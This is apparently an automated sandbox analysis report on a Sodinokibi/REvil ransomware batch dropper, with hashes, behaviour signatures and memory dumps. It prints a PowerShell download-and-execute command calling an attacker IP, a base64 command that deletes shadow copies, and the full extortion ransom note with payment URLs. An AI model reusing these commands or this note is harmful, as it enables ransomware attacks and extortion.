Analysis

  • max time kernel
    62s
  • max time network
    68s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    12-08-2020 07:10

General

  • Target

    16158bc1db4ba8fb8e9a13c34c8a51e1.bat

  • Size

    216B

  • MD5

    bf75953509fd375616976c6eb6f30aff

  • SHA1

    3bf54cce4abd3c3434b7073e4ebe0f480295923c

  • SHA256

    5edd7915fd9b57f2643fe8abf646344fccd2efc98d4dcbeab47659b14f59feb4

  • SHA512

    8362b4f7c808e754bb468b31140b3ec023527e468ec8a9171111f77e39c55a8b04cc3442bc4c334a3cce25e90b9ce5cd14842d7cbd66fef8d6051d02f8e953f9

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/16158bc1db4ba8fb8e9a13c34c8a51e1

Extracted

Path

C:\atug0vw6-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension atug0vw6. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). We have copied financial files and other important information about personal data, it will be published on the Internet or will be used against you if you do not pay us, so if you do not want such consequences as customer churn, media coverage, fines like GDRP and other damages, we recommend you to contact us and pay the ransom. [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F3E42D37D77A1BEC 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/F3E42D37D77A1BEC Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: Ay44zmn3Lp8oRsb1GeHshjLhLBCgv7RglcwrkGkHe/S1MLhiP2ohFt9FDdjg2PAW oYC8mKdMW6ukpkWYWZVQmz9NteHwYdyD40K/sYJLEvqj4f4uO5dPWEmOimZUebkS DfUrmjMAQTnU1FDYngN5hQTDYq2Z6fV1KtDhbowa3j+7OXkQHdEyZIi2PZxcHUhV ItGCdWYmt6J97ui3vvhOE+3vWFVpAcEjHuQHq2HoDGnpxkHt+KrHAPfTxRAUga8G MmLLylgEyM0OIHw54MSzSNmom7WMLx1EtC7KorghYSyC1uiSxQ+ug9gX9GgkUVdu hpfRurc7+DtZhfS/QfM/0Q311utoLB491YU0FXw0xhu7lra+I132euJJ+ogsUN+8 ghJhs2d2pWJm4tK7NV28b8ZESD2q5KxlkOEaoeTzSS5ojJsQAyAc/GMI78SQSH7F St3a0oR/r5F1K/vm3ESvfFGsRYQDzepd0Y93J9I/Tys/Gfzbz8ex4WVEUm060YcZ fQI9AEmtKxx1NWSc2kFd9ietBNMRFfE245IbBpYJwgdmIByGDzwjS4FENH4BLieB dmQRiLBiT1A5mTjyfC4Ld6jiEdgv9JzxW58YBylF44Wa6MDwq21swkobUihQbBVC aORE1M7HAsupO+0I7R4xs71g1BcEjvwnp07VbFry/JEkvYJ92YRhSgHSZJywmmhw s8Tss2cHiv1aZPByBH6ukaVCJ1D4MXxhSLvRVo1zEAaqNwFsG9HxoRefGqwKDOq0 x7g89N2HSPpb46QObeP3bKiK2bfSM5psxnyVhN1NAFcbLGV9mCL2tiLrcBR+v0uQ GswoLZPnaDntpbkDoHuwaY9xsUYDOUq7crwnpAMEklPIJQaka5PGIljAZqxpDfLq YhsJ3Yp7Vf1uw/YrndR/8bK3GidBwAq4fH4quNfnlgVNdNWnE8vUenCEqBS6fBqW tnYdu5afdmI2enTcW2e1LtJP1mCWcTueWsw648HvUx1+1YQ9+cEE/a7jNVNCh9q5 nCgtgVtyUawzwljWCKQ0IMgpzSdc9aawdxNgzbrJjtZMkyJdSuqm0opCH2qw0dWZ UxZCCIlyXJ6vwBuCaSTu3AUpGK76EoCOKvmjA/Xonsb+SxcFoELvndy5b5BRQubt MQ3C541TQirVWGDt00iBKskw2SyPMItphfI0rpdYFnM0fU6R4G+t2s9ZWmKaWoWV fcwsVWPC+FwGQTq/MQGQzdrb+VRyGIL+D6MPf6/fHXlwDzEutowlU8GPp9ffcPEH HYjlxA/TJmUHtoiyXO19R5k/pKAYLoP5TFpeXlx8eGQJQNrS ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F3E42D37D77A1BEC

http://decryptor.cc/F3E42D37D77A1BEC

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Blacklisted process makes network request 1 IoCs
  • Modifies extensions of user files 8 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Enumerates connected drives 3 TTPs
  • Modifies service 2 TTPs 4 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 29 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\16158bc1db4ba8fb8e9a13c34c8a51e1.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1104
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/16158bc1db4ba8fb8e9a13c34c8a51e1');Invoke-ZOPUSYDNI;Start-Sleep -s 10000"
      2⤵
      • Blacklisted process makes network request
      • Modifies extensions of user files
      • Sets desktop wallpaper using registry
      • Drops file in Program Files directory
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:864
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1492
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:1568

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_231c2208-0720-4eec-b9f1-8bba11abd9fa

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_57c6647c-75fc-47bb-8ce4-3b8f0921c533

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6d5fa298-996f-4fc9-9c01-b2226cbdaeba

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7d6878ec-2a8b-418c-8f2b-b6fcd4b50cf8

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e43ce3f6-b60d-4b70-bed1-86e53bf07360

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fabbb9cf-9b8c-4b2f-b33d-0de7a9a3a10e

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

  • memory/864-5-0x00000000052C0000-0x00000000052C1000-memory.dmp

    Filesize

    4KB

  • memory/864-21-0x0000000006290000-0x0000000006291000-memory.dmp

    Filesize

    4KB

  • memory/864-22-0x00000000062C0000-0x00000000062C1000-memory.dmp

    Filesize

    4KB

  • memory/864-14-0x0000000006150000-0x0000000006151000-memory.dmp

    Filesize

    4KB

  • memory/864-13-0x0000000006080000-0x0000000006081000-memory.dmp

    Filesize

    4KB

  • memory/864-8-0x0000000006040000-0x0000000006041000-memory.dmp

    Filesize

    4KB

  • memory/864-0-0x0000000000000000-mapping.dmp

  • memory/864-4-0x0000000002600000-0x0000000002601000-memory.dmp

    Filesize

    4KB

  • memory/864-3-0x0000000004700000-0x0000000004701000-memory.dmp

    Filesize

    4KB

  • memory/864-2-0x00000000024E0000-0x00000000024E1000-memory.dmp

    Filesize

    4KB

  • memory/864-1-0x0000000073FC0000-0x00000000746AE000-memory.dmp

    Filesize

    6.9MB

  • memory/1492-23-0x0000000000000000-mapping.dmp

  • memory/1492-25-0x0000000073FC0000-0x00000000746AE000-memory.dmp

    Filesize

    6.9MB